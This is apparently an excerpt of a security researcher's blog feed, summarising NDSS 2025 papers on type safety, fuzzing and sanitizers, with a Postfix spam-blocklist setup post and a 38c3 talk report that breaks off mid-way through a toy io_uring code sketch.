&lt;p&gt;Our works target the security and safety of core infrastructure such as
browsers, hypervisors, and system services. Through a combination of mitigation,
sanitization, and fuzzing we increase the resilience of our core systems against
attacks.&lt;/p&gt;
&lt;p&gt;First, &lt;a class="reference external" href="/blog/2025/0226-typepp.html"&gt;Nicolas presented his PhD work on type++&lt;/a&gt;,
where we introduce a dialect of C++ that is fully type safe. Type++ validates
all cast operations at runtime and ensures that no type confusion is possible.
With only 229 lines of code changed, we even protect most of Chromium with
negligible performance impact.&lt;/p&gt;
&lt;p&gt;Second, &lt;a class="reference external" href="/blog/2025/0226-dumpling.html"&gt;Liam presented his work on Dumpling&lt;/a&gt;,
where we create detailed state snapshots as an oracle to detect misalignment
between the V8 interpreter and optimizing compiler. This key insight of slightly
modifying the JavaScript engine gives our fuzzer detailed visibility into the
internal program state and enabled us to find severe vulnerabilities.&lt;/p&gt;
&lt;p&gt;Third, &lt;a class="reference external" href="/blog/2025/0226-qmsan.html"&gt;Matteo presented his work on QMsan&lt;/a&gt;,
where we design an efficient two-tier sanitizer that detects uninitialized
memory during fuzzing campaigns. Through binary rewriting, we can check all
executed code, gaining essential coverage and reducing false positives. To
further improve performance, we also greedily reduce instrumentation, only
running it on demand.&lt;/p&gt;
&lt;p&gt;Fourth, &lt;a class="reference external" href="/blog/2025/0226-truman.html"&gt;Zheyu presented his work on Truman&lt;/a&gt;,
where we fuzz virtual devices of hypervisors. By automatically extracting state
dependencies, inter-message dependencies, and intra-message dependencies we
create precise peripheral models that our fuzzer then uses to thoroughly explore
virtual devices.&lt;/p&gt;
&lt;p&gt;&lt;img alt="ndss2" src="/blog/static/2025/0227/ndss2.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;While all credit goes to the students working tirelessly on these projects, I'm
proud of the HexHive family that we achieved such a great and impressive result.
Nicolas made great progress towards his PhD, which he will defend in about a
month; Liam and Julian did an amazing master project with us; Matteo, who was
advised by Daniele, made immense progress on his PhD; and Zheyu, who was a
visiting PhD student, also just defended his PhD. In addition to the artifact evaluation, we
are also extremely proud to receive &lt;em&gt;two distinguished paper awards&lt;/em&gt; at
NDSS for Type++ and Dumpling. Keep your eyes open for these people as they are
out to do great things!&lt;/p&gt;
</content><category term="Conferences"></category><category term="NDSS"></category></entry><entry><title>Type++: A Type-Safe C++ Dialect</title><link href="/blog/2025/0226-typepp.html" rel="alternate"></link><published>2025-02-26T23:55:00-05:00</published><updated>2025-02-26T23:55:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-02-26:/blog/2025/0226-typepp.html</id><summary type="html">&lt;p&gt;The C++ language combines a massive potential for raw power with the massive
risk of type and memory safety violations. The developer is inherently
responsible for securing all executed code and to guarantee type safety and
memory safety. We are particularly focused on type safety. In C++, developers
can cast …&lt;/p&gt;</summary><content type="html">&lt;p&gt;The C++ language combines a massive potential for raw power with the massive
risk of type and memory safety violations. The developer is inherently
responsible for securing all executed code and to guarantee type safety and
memory safety. We are particularly focused on type safety. In C++, developers
can cast objects from one type to another. While upcasts in the type lattice are
always safe, downcasts may be unsafe as the size (and fields) of a child object
may be different from the parent. In existing code bases, few---if
any---casts are validated at runtime, not just due to the performance cost but
also due to an inherent incompatibility: thanks to C++'s relation with C, most
objects are simple arrays of bytes without any associated type information. Only
a few classes, namely those with virtual functions, carry type information. To
implement virtual dispatch, C++ adds a field to the class that identifies the
type and allows virtual calls to dispatch to the method of the underlying type
of the object. Only a small percentage of classes have virtual methods, and only
those can be checked at runtime.&lt;/p&gt;
&lt;p&gt;&lt;img alt="typepp1" src="/blog/static/2025/0226/typepp1.png" /&gt;&lt;/p&gt;
&lt;p&gt;To ensure compatibility between C and C++, existing mechanisms tried to store
disjoint type metadata: for each allocated object they recorded type
information, and for each cast they checked that the cast object actually
corresponds to the correct type. This disjoint metadata is expensive to manage
and results in incompatibilities, as cleaning up metadata after objects are
destroyed is often omitted.&lt;/p&gt;
&lt;p&gt;&lt;img alt="typepp2" src="/blog/static/2025/0226/typepp2.png" /&gt;&lt;/p&gt;
&lt;p&gt;Our key idea with &lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS.pdf"&gt;type++&lt;/a&gt; is to
create a dialect of C++ that explicitly incorporates type information into all
classes. This embedded type information, present in all allocated objects,
allows efficient type checks for all casts. In our
&lt;a class="reference external" href="https://github.com/HexHive/typepp"&gt;implementation&lt;/a&gt;, we make all type casts
explicit and leverage this runtime information to validate each cast at runtime.&lt;/p&gt;
&lt;p&gt;Our evaluation shows that even for large projects, only few lines need to be
changed. For example, for the millions of lines of code of the SPEC CPU
benchmarks, we only change 125 lines for SPEC CPU2006 and 131 lines for SPEC
CPU2017. For Chromium, we only change 229 lines of code to protect large parts
of the 35 million lines of code. The performance overhead hovers around a very
reasonable 1%. We conclude that enforcing type safety across even large projects
is feasible with minimal code changes. Developers should aim for full type safety
and protect their code against type confusion attacks!&lt;/p&gt;
&lt;p&gt;This work was a collaboration among Nicolas Badoux, Flavio Toffalini, Yuseok
Jeon, and Mathias Payer all at the HexHive as part of Nicolas' main PhD project.
This work received all artifact evaluation badges and, at
the conference, received a &lt;em&gt;distinguished paper award&lt;/em&gt;.&lt;/p&gt;
</content><category term="Academia"></category><category term="mitigation"></category><category term="sanitizer"></category><category term="type safety"></category><category term="NDSS"></category></entry><entry><title>Dumpling: dumping fine-grained execution state</title><link href="/blog/2025/0226-dumpling.html" rel="alternate"></link><published>2025-02-26T23:05:00-05:00</published><updated>2025-02-26T23:05:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-02-26:/blog/2025/0226-dumpling.html</id><summary type="html">&lt;p&gt;JavaScript engines face a dilemma: on one end, they need to be extremely
efficient as they are processing millions of lines of JavaScript code,
dynamically translating complex programs into efficient code. On the other end,
the code may be controlled by an attacker that is trying to exploit bugs in …&lt;/p&gt;</summary><content type="html">&lt;p&gt;JavaScript engines face a dilemma: on one end, they need to be extremely
efficient as they are processing millions of lines of JavaScript code,
dynamically translating complex programs into efficient code. On the other end,
the code may be controlled by an attacker that is trying to exploit bugs in the
JavaScript engine to escalate their privileges on the user's computer.
JavaScript engines must therefore balance performance and security.&lt;/p&gt;
&lt;p&gt;Automated testing is a cornerstone to find and fix as many bugs in the
JavaScript engine as possible but fuzzers are faced with the dilemma that
complex bugs between different phases of the just-in-time compiler are hard to
detect. JavaScript engines switch between different execution tiers, e.g., from
a simple interpreter that starts quickly but executes code inefficiently to an
optimizing compiler that compiles slowly but produces highly efficient code.
Both the interpreter and the optimizing compiler must follow the same data and
stack formats to allow seamless switching between tiers.
Triggering --- and then detecting --- these bugs is challenging as information
about this lower layer is not exposed to JavaScript where most existing fuzzers
operate.&lt;/p&gt;
&lt;p&gt;Our key idea is to instrument the JavaScript engine itself to record and dump
detailed information whenever we switch execution profiles, allowing the fuzzer
to compare states across engines. In
&lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS2.pdf"&gt;Dumpling&lt;/a&gt;, we create a fuzzer that
targets the different layers of the JavaScript engine and explores these state
transitions through detailed state dumping. Instead of only comparing single
variables, we have a detailed overview of the exact execution and memory state.
The key benefit is that these state comparisons allow Dumpling to expose bugs
&lt;em&gt;before&lt;/em&gt; they are observable at the JavaScript layer.&lt;/p&gt;
&lt;p&gt;&lt;img alt="dumpling" src="/blog/static/2025/0226/dumpling.png" /&gt;&lt;/p&gt;
&lt;p&gt;While the &lt;a class="reference external" href="https://github.com/two-heart/dumpling-artifact-evaluation"&gt;implementation&lt;/a&gt; is specific to V8,
this JavaScript engine is used not just in Chrome but across many different
projects. The hooks are lightweight and could be implemented in other engines
with minimal engineering effort. In our evaluation, we showcase that the
overhead is reasonable and the precision of our bug oracle enables the detection
of eight severe bugs that we responsibly disclosed to Google.&lt;/p&gt;
&lt;p&gt;The key takeaway of Dumpling is that by extracting some internal state and
making it visible to the fuzzing engine, we have designed a bug oracle that is
much more powerful than simply probing certain variables. Slight modifications
of the underlying system may pay off in much higher precision!&lt;/p&gt;
&lt;p&gt;This work was a collaboration among Liam Wachter, Julian Gremminger, Christian
Wressnegger, Mathias Payer, and Flavio Toffalini. Liam and Julian deserve the
majority of the credit for this project that they conducted during their master
thesis at the HexHive. This work received all artifact evaluation badges and, at
the conference, received a &lt;em&gt;distinguished paper award&lt;/em&gt;.&lt;/p&gt;
</content><category term="Academia"></category><category term="fuzzing"></category><category term="javascript"></category><category term="NDSS"></category></entry><entry><title>QMSan: discovering uninitialized memory errors in binaries</title><link href="/blog/2025/0226-qmsan.html" rel="alternate"></link><published>2025-02-26T22:40:00-05:00</published><updated>2025-02-26T22:40:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-02-26:/blog/2025/0226-qmsan.html</id><summary type="html">&lt;p&gt;Sanitizers serve as the primary bug detection Oracle during automated testing.
They &amp;quot;crash&amp;quot; the program gracefully and tell the fuzzer when and where a bug was
triggered. The most well-known sanitizer is ASan or AddressSanitizer which adds
redzones around memory objects to detect whenever an access is out-of-bounds.
MSan or …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Sanitizers serve as the primary bug detection oracle during automated testing.
They &amp;quot;crash&amp;quot; the program gracefully and tell the fuzzer when and where a bug was
triggered. The most well-known sanitizer is ASan or AddressSanitizer which adds
redzones around memory objects to detect whenever an access is out-of-bounds.
MSan or MemorySanitizer detects access to uninitialized memory. Upon allocation,
all memory of an object is marked as uninitialized. When written, the memory is
marked as initialized. For each read, the sanitizer validates that the
underlying memory was properly initialized.&lt;/p&gt;
&lt;p&gt;Compared to ASan, MSan faces a key challenge: all code must be instrumented,
otherwise, some memory initialization may be missed resulting in false positive
crashes. For ASan, missing instrumentation only results in false negatives
(i.e., some bugs will be missed) but MSan is prone to both false positives and
false negatives, which has so far hindered MSan's deployment. Therefore, only
210 out of 528 OSS-Fuzz targets were fuzzed with MSan.&lt;/p&gt;
&lt;p&gt;In our &lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS3.pdf"&gt;QMSan&lt;/a&gt; project, we develop a
mechanism that reduces these false positives, creating an efficient MSan
sanitizer for fuzzing environments. Our system uses two key ideas to reduce
false positives: first, we use binary instrumentation to track all writes and
second, we build a two-stage approach to massively reduce the cost of tracking
initialized data.&lt;/p&gt;
&lt;p&gt;The first contribution is simple: instead of using a compiler-pass to add
instrumentation during compilation, we add the instrumentation through QEMU when
code is being executed. The QEMU binary instrumentation engine allows us to
analyze and instrument all code as it is being executed and gives us complete
support for all code. Binary instrumentation comes at a slight overhead
compared to compiler-based instrumentation, but the reduction of false positives
is worth the trade-off.&lt;/p&gt;
&lt;p&gt;&lt;img alt="qmsan" src="/blog/static/2025/0226/qmsan.png" /&gt;&lt;/p&gt;
&lt;p&gt;The second contribution is geared towards making MSan efficient for fuzzing.
MSan requires that the state of memory (initialized or not) is copied whenever
data is copied. This requires an expensive propagation of metadata information
whenever data is read and stored in other areas of memory. Our key idea here was
that fuzzing allows us to replay executions as we have the exact input. For the
majority of executions, we only track reads and writes but ignore shadow
propagation (that is otherwise required on nearly all other instructions). If
our sanitizer detects a crash, we call it a potential violation and replay the
same input with the full sanitizer that extensively propagates shadow metadata.
If it turns out to be a true positive, we report it as a bug. If it turns out to
be a false positive, we mark its location and ignore future false positives at
this location.&lt;/p&gt;
&lt;p&gt;Our evaluation on 10 OSS-Fuzz targets and 5 proprietary targets discovered 44
new bugs that we responsibly disclosed. Our implementation is competitive with
the compiler-based one while offering massively increased compatibility. The
&lt;a class="reference external" href="https://github.com/heinzeen/qmsan"&gt;source code&lt;/a&gt; of our sanitizer is available
as open-source. Please reach out to us with any questions!&lt;/p&gt;
&lt;p&gt;This work was a collaboration between Matteo Marini, Daniele Cono D'Elia,
Mathias Payer, and Leonardo Querzoni. Matteo was the main PhD student working on
the project. He and Daniele deserve the majority of the credit for this work.&lt;/p&gt;
</content><category term="Academia"></category><category term="binary"></category><category term="fuzzing"></category><category term="sanitizer"></category><category term="NDSS"></category></entry><entry><title>Truman: discovering hypervisor bugs through virtual device models</title><link href="/blog/2025/0226-truman.html" rel="alternate"></link><published>2025-02-26T21:45:00-05:00</published><updated>2025-02-26T21:45:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-02-26:/blog/2025/0226-truman.html</id><summary type="html">&lt;p&gt;Hypervisors power not just the cloud but are becoming a commodity in mobile
phones and desktops as well. They separate virtual machines from each
other, enabling strong isolation and security guarantees. In cloud environments,
hypervisors separate non-trusting virtual machines and an attacker may try to
compromise and gain access to …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Hypervisors power not just the cloud but are becoming a commodity in mobile
phones and desktops as well. They separate virtual machines from each
other, enabling strong isolation and security guarantees. In cloud environments,
hypervisors separate non-trusting virtual machines and an attacker may try to
compromise and gain access to a co-located virtual machine of a competitor. In
mobile environments, hypervisors may isolate trusted applications that
process highly sensitive data from untrusted environments. On desktops,
hypervisors may separate recovery environments from general purpose
environments. In all cases, an attacker with access to the untrusted side wants
to escalate their privileges to gain access to the hypervisor which in turn has
access to all other virtual machines.&lt;/p&gt;
&lt;p&gt;Under this attacker model, we have already explored automated testing (fuzzing)
by targeting virtual devices. Fuzzing is the dominant technique in software
testing that uses feedback (often through coverage --- code areas that have been
executed) from the execution of automatically created inputs to guide the
mutation of future inputs.&lt;/p&gt;
&lt;p&gt;When switching from the guest operating system to the hypervisor, virtual
devices interpret the request and act on it. As they are implemented in software
and need to parse complex requests, they are prone to bugs. During our earlier
work &lt;a class="reference external" href="https://nebelwelt.net/files/23Oakland4.pdf"&gt;ViDeZZo&lt;/a&gt; that we published
at Oakland'23, we explored dependencies in requests to virtual devices with
particular focus on dependencies across multiple messages and dependencies of
fields inside a message. While this allowed us to discover some severe bugs, we
were not completely satisfied with the achieved coverage.&lt;/p&gt;
&lt;p&gt;Therefore, we explored ways to create an even better fuzzer for virtual devices
that achieves higher coverage and finds deeply hidden bugs. In &lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS4.pdf"&gt;Truman&lt;/a&gt; at NDSS'25, our intuition is to
construct detailed device behavior models that the fuzzer can use to thoroughly
and precisely explore virtual devices.&lt;/p&gt;
&lt;p&gt;&lt;img alt="truman" src="/blog/static/2025/0226/truman.png" /&gt;&lt;/p&gt;
&lt;p&gt;Our two core contributions are that we (i) infer state dependencies and model
the state of the underlying device and (ii) automatically infer three kinds of
dependencies by analyzing the source code of open-source virtual device
implementations. The three dependencies are inter-message dependencies (similar
to ViDeZZo), intra-message dependencies (again, similar to ViDeZZo), and state
dependencies.&lt;/p&gt;
&lt;p&gt;Using these extracted dependencies, our fuzzer then drives the exploration of
virtual devices in QEMU, VirtualBox, VMWare Workstation Pro and Parallels with a
total of 54 new bugs discovered and 6 CVEs assigned. If you're interested, read
the &lt;a class="reference external" href="https://nebelwelt.net/files/25NDSS4.pdf"&gt;paper&lt;/a&gt;, check out the
&lt;a class="reference external" href="https://github.com/vul337/Truman"&gt;source&lt;/a&gt; and reach out to us with any
questions!&lt;/p&gt;
&lt;p&gt;This work was a collaboration among Zheyu Ma, Qiang Liu, Zheming Li, Tingting
Yin, Wende Tan, Chao Zhang, and Mathias Payer. Zheyu did the heavy lifting
as a visiting PhD student at the HexHive laboratory and deserves the main credit
for this work.&lt;/p&gt;
</content><category term="Academia"></category><category term="hypervisor"></category><category term="fuzzing"></category><category term="NDSS"></category></entry><entry><title>Auto-tagging SPAM emails</title><link href="/blog/2025/0127-spam.html" rel="alternate"></link><published>2025-01-27T21:45:00-05:00</published><updated>2025-01-27T21:45:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2025-01-27:/blog/2025/0127-spam.html</id><summary type="html">&lt;p&gt;Are you tired of publishing SPAM? Join me on a journey to set up simple
blocklists to auto-filter based on origin and sender for Postfix mail servers.&lt;/p&gt;
&lt;p&gt;If you're in academia, you likely know publishing SPAM. For those that are not
(or missed out on the pleasure so far), publishing …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Are you tired of publishing SPAM? Join me on a journey to set up simple
blocklists to auto-filter based on origin and sender for Postfix mail servers.&lt;/p&gt;
&lt;p&gt;If you're in academia, you likely know publishing SPAM. For those that are not
(or have missed out on the pleasure so far), publishing SPAM comes from publishers
that send unsolicited requests for articles, offer publication services, or hawk
other auxiliary services such as proofreading or &amp;quot;help&amp;quot; to get papers published.
They generally don't offer unsubscribe features and keep you on their list,
especially if you reply.&lt;/p&gt;
&lt;p&gt;While not disastrous, these emails are annoying. For example, I end up with
10-15 such unwanted emails in my inbox each day. My initial goal was to
train local SPAM filters to remove these emails. As I'm using at least 5
different computing systems (desktop home, desktop office, laptop home, laptop
office, mobile client --- I know, I should look for help), I was looking for a
different solution that avoids over-training local SPAM filters.
Given that these publishers generally stick to their domains and emails, a
simple blocklist should be sufficient to filter them. As I'm running my own mail
server, this should be a piece of cake, right?&lt;/p&gt;
&lt;p&gt;On my mail server, the main pieces are postfix for smtp handling, SpamAssassin
for SPAM filtering, maildrop for vmail delivery, and dovecot for imap
connections to the clients. Any of these components should be able to implement
a simple blocklist based on the sender address. Or so I thought.
Paging in all the configuration and customization across the different
components was somewhat difficult, especially as my configuration grew over the
last couple of years.&lt;/p&gt;
&lt;p&gt;After searching the web for a bit, I discovered the PREPEND feature for
&lt;cite&gt;smtpd_sender_restrictions&lt;/cite&gt;. This must be it, I thought and tried to learn more.
But the man page is rather dry and stackoverflow was not of much help (anymore).
I therefore turned to ChatGPT and asked it for options.&lt;/p&gt;
&lt;p&gt;What ChatGPT got right was that it's not straightforward to move mail to
alternate folders in Postfix as maildrop/dovecot takes care of local mail
delivery. But I can tag messages. Unfortunately, ChatGPT also hallucinated
quite a bit, offering options and half-truths about configurations that did not work
reliably. While I initially assumed that Debian stable was just too outdated,
some of the flags that ChatGPT suggested simply did not exist.&lt;/p&gt;
&lt;p&gt;Another issue I ran into was that spamassassin removes any &lt;cite&gt;X-Spam-ABC&lt;/cite&gt; flag
when filtering email. As I initially tried to set the &lt;cite&gt;X-Spam-Status: YES&lt;/cite&gt; to
have dovecot filter the mail to the Junk folder, spamassassin silently removed
the tag during processing.&lt;/p&gt;
&lt;p&gt;After quite some trial and error, I settled on&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;smtpd_sender_restrictions&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt;
    &lt;span class="n"&gt;check_sender_access&lt;/span&gt; &lt;span class="nb"&gt;hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;etc&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;postfix&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="n"&gt;sender_access&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="o"&gt;...&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;with the file &lt;cite&gt;sender_access&lt;/cite&gt; being auto-generated from a simple text file
where I record unwanted email addresses and domains. For each email address, I
add a line &lt;cite&gt;foo&amp;#64;bar.com PREPEND X-Blocklist: YES&lt;/cite&gt; and afterwards run &lt;cite&gt;postmap
sender_access&lt;/cite&gt;.&lt;/p&gt;
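&lt;p&gt;For illustration, the source text file could look like this (addresses made up); to my knowledge, a bare domain key in a Postfix access table matches any sender at that domain:&lt;/p&gt;

```
# sender_access source file; rebuild the hash map with: postmap sender_access
spammy.editor@predatory-journal.example    PREPEND X-Blocklist: YES
predatory-journal.example                  PREPEND X-Blocklist: YES
```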
&lt;p&gt;In my dovecot sieve for local delivery where I already move SPAM email into the
Junk folder, I then simply do the same for any emails tagged with &lt;cite&gt;X-Blocklist:
YES&lt;/cite&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;header&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="n"&gt;contains&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;X-Blocklist&amp;quot;&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;YES&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;fileinto&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Junk&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This exercise took me roughly 1.5 days including testing. I was a bit surprised
by how much stackoverflow has degraded. It's also an unfortunate fact that very
few people keep running their own mail servers and not much information is out
there (only a few outdated forum posts). Similarly, the hallucinations of
ChatGPT were somewhat scary and led me down a few wrong paths. In the end, a
combination of trial-and-error, configuration hunting, reading lots of forum
posts, and using ChatGPT in a developer-in-the-loop mode somewhat helped solve
this issue.&lt;/p&gt;
&lt;p&gt;Do you think it was worth spending 1.5 days to delete unwanted email? Also, how
long will it take me to recoup the cost of this over-engineering? ;)&lt;/p&gt;
</content><category term="Random"></category><category term="SPAM"></category><category term="filtering"></category><category term="blocklist"></category></entry><entry><title>38c3: Hutzelwutze in Hamburg</title><link href="/blog/2024/1230-38c3.html" rel="alternate"></link><published>2024-12-30T15:52:00-05:00</published><updated>2024-12-30T15:52:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2024-12-30:/blog/2024/1230-38c3.html</id><summary type="html">&lt;p&gt;Another year, another CCC. It's been a long road from Berlin to Leipzig and
Hamburg. Each year, I repeat the ritual of going to the &amp;quot;Kongress&amp;quot;, the most
amazing hacker get together in the world. The Kongress is special, hackers of
all denominations meet, engage, hack, and enjoy a few …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Another year, another CCC. It's been a long road from Berlin to Leipzig and
Hamburg. Each year, I repeat the ritual of going to the &amp;quot;Kongress&amp;quot;, the most
amazing hacker get-together in the world. The Kongress is special: hackers of
all denominations meet, engage, hack, and enjoy a few mellow days towards the
end of the year.&lt;/p&gt;
&lt;p&gt;I was amazed by the large number of assemblies and enjoyed the CTF assembly with
the flying shark, all the lights and constructions throughout along with the
secret party in a hidden restroom (one had to enter from a side door at one of
the halls, go to a lower floor and then discover a club built into a restroom
with lights, speakers, good music and a whole bunch of people) and the even more
secret club (apparently called something like the Hutzelwutze but don't blame me
for the spelling) further down hidden somewhere in the basements of the congress
center.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2024/1230/congress.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;This year, around 10 HexHivers were present. Some of us gave a talk and many
joined the 40 Organizer/Polygl0t players for the CTF. Overall a good showing
from Switzerland and we'll certainly be back next year!&lt;/p&gt;
&lt;p&gt;Same as every year, I attended a few talks and, given the 14,000 attendees,
did not make it into the rooms for some of the others. The rest of the blog
post highlights some of the amazing talks and gives a small summary.&lt;/p&gt;
&lt;div class="section" id="day-1-quality-talks"&gt;
&lt;h2&gt;Day 1: Quality Talks&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;ACE up the sleeve: Hacking into Apple's new USB-C controller&lt;/em&gt; by stacksmashing.
Stacksmashing explained to us how he reverse engineered the new Apple USB-C
controller by first targeting and understanding the previous model. The talk was
deeply technical but fun. Especially the firmware extraction, analysis, and
mapping was a massive amount of work. Stacksmashing made it sound easy but
overall this was a very cool talk that is highly recommended to those interested
in USB-C firmware and potentially the discovery of bugs.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Investigating the Iridium Satellite Network&lt;/em&gt; by sec and Schneider. I'm old
enough to have seen the first talk they did on Iridium a few years ago and this
talk was an amazing continuation. The Iridium satellite network is getting a bit
older but still hides some secrets. Sec and Schneider went into some low level
signal details and how the text messaging system sent unencrypted text messages
through &amp;quot;beams&amp;quot; to different places. They speculated that Iridium could be used
as a positioning system, replacing GPS or other services. But they also
highlighted privacy implications of these services that are usually running in
clear text for both audio and text messages. Surprisingly, a lot of the
audio/texts they decoded were test messages, raising the question of how much
Iridium is actually still used.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;EU's Digital Identity Systems - Reality Check and Techniques for Better
Privacy&lt;/em&gt; by Anja Lehmann and socialhack.
I explored this talk due to the upcoming Swiss ID system that shares some
aspects with the EU one. Anja and socialhack gave a great overview of the
underlying technology and highlighted some risks. Even though the underlying
cryptography is rather complex, Anja managed to explain it in a straightforward
manner that was understandable to anyone with a basic background in computer
science. Towards the later part of the talk, they also highlighted possible
future-proof extensions and argued for &amp;quot;a leap of faith&amp;quot;
towards new research, allowing them to build better privacy-preserving tools
that can be used in these ubiquitous identity systems.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Wir wissen wo dein Auto steht - Volksdaten von Volkswagen&lt;/em&gt; by Michael Kreil
and Flüpke. As it turns out, Volkswagen had a &amp;quot;Datenreichtum&amp;quot; (hacker slang for
an involuntary wealth of data): they left large amounts of data publicly
accessible in an AWS bucket. The discovery
started through a simple enumeration of web endpoints and the underlying
framework left the heap dump feature enabled, allowing the hackers to download
the full heap &amp;quot;for debug purposes&amp;quot;. In this heap dump, they discovered general
tokens that allowed them to impersonate any user and get access to the AWS
storage. The storage dump contained full information about the owners such as
email addresses and sometimes phone numbers but also GPS traces over long
periods of time. This was a massive breach of privacy and trust. It is
unclear why Volkswagen collected this information in the first place and deeply
concerning that it was openly accessible.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;We've not been trained for this: life after the Newag DRM disclosure&lt;/em&gt; by
Michal Kowalczyk, q3k, and Jakub Stepniewicz. This follow-up to last year's talk
discussed how the researchers were SLAPPed with frivolous lawsuits intended to silence
them. Last year, these hackers from Dragon Sector talked about how Newag added
DRM to their trains along with geolocking to undermine competitors that were
interested in servicing these trains. Instead of admitting fault, Newag went all
in and started suing people left and right, including the hackers who reverse
engineered the DRM (including discovering the magic unlock code, part of which
is pressing the SOS button in the toilet) and the geolocks.
While they presented it lightly, it must suck massively when companies
pull such shit moves and start suing security researchers. Not sure Newag
understands how hackers work.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Fnord-Nachrichtenrückblick 2024&lt;/em&gt; by Fefe and Atoth.
This year Frank could not make it to the CCC, so Fefe had to find some
replacements. As every year, the talk highlighted some of the fuckups and
screwups of the year and was as entertaining as ever. Recommended as an
alternative review of the year in tech and tech politics.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-2-moving-to-eastern-time"&gt;
&lt;h2&gt;Day 2: Moving to Eastern Time&lt;/h2&gt;
&lt;p&gt;As always at the CCC, there is a massive intergalactic time shift. This day, we
therefore had breakfast on Eastern time, roughly six hours behind Central
European time. Still, we managed to sneak in and get some food.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;From Pegasus to Predator - The evolution of Commercial Spyware on iOS&lt;/em&gt; by
Matthias Frielingsdorf. Great overview of different iOS exploitation vectors and
how the spyware evolved over time. Unfortunately the room was full and I could
not make it in, but I marked this talk for later consumption.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Fearsome File Formats&lt;/em&gt; by Ange Albertini. This talk ran concurrently with the macOS
talk but, knowing Ange, I also marked it for later watching.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;MacOS Location Privacy Red Pill: A Rabbit Hole Resulting in 24 CVEs&lt;/em&gt; by Adam M.
As this talk was not recorded, I managed to sneak in and check out Adam's talk.
He highlighted the new macOS TCC privacy framework that restricts how
applications can access privacy-relevant data. He discovered that applications
often leak private information such as location data or other details through
side channels. An unprivileged app can therefore leak this information from
privileged apps. Overall, this talk was not super exciting, as the &amp;quot;fail open&amp;quot;
approach where untrusted applications still have incredible access to log
information or the file system seems ultimately in conflict with security and
privacy. Also, the presented CVEs were all 1-2 years old and seemed a bit stale.
I learned later that this talk was already given several times at other venues,
so not the best use of my time overall.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;10 years of emulating the Nintendo 3DS: A tale of ninjas, lemons, and pandas&lt;/em&gt;
by neobrain. Neobrain is a key emulation hacker and has vast experience with the
different 3DS emulation platforms. He shared some political insights into how to
build a thriving community around emulation development, but also some design
aspects of how to make efficient and performant emulators. The key is selecting the
right emulation abstraction. While the underlying ISA is fairly straightforward,
one must select a reasonable abstraction layer to implement the
different services. The three main options are to emulate the raw hardware where
it is difficult to translate between the different peripherals, to emulate at
the micro kernel interface to abstract away the low level devices, or to
emulate at the high level of services. Neobrain explained how he moved from a
high-level emulator to a mid-level emulator and saw massive success and
speed-ups. Great technical talk overall with some fun sprinkles of politics. And, as
you may know, I'm always a sucker for some cool binary analysis and translation.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;io_uring, eBPF, XDP and AF_XDP&lt;/em&gt; by LaF0rge. Harald Welte, known from Osmocom,
told us some technical details about how to write high performance I/O stacks
that read from thousands of file descriptors. A key overhead with I/O is that
many small reads result in massive amounts of transitions between user space and
kernel space and lots of copying of data. The new io_uring interface in the
kernel makes this much faster as I/O becomes asynchronous and the user-space
program can send and receive at the same time by filling data into a ring
buffer. Harald highlighted the different pros and cons and overall gave a nice
introduction.&lt;/p&gt;
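&lt;p&gt;As a rough conceptual sketch (not the real kernel ABI, where shared-memory ring buffers and the liburing API are used), the submission/completion-queue idea can be modeled like this: many requests are queued in user space, a single boundary crossing services the whole batch, and results are harvested from a completion queue.&lt;/p&gt;

```python
import io
from collections import deque

# Toy model of the io_uring idea: user space fills a submission queue (SQ)
# with many requests, crosses into the "kernel" once for the whole batch,
# and later harvests results from a completion queue (CQ). Deques stand in
# for the real shared-memory ring buffers.
class ToyRing:
    def __init__(self):
        self.sq = deque()       # submission queue entries (SQEs)
        self.cq = deque()       # completion queue entries (CQEs)
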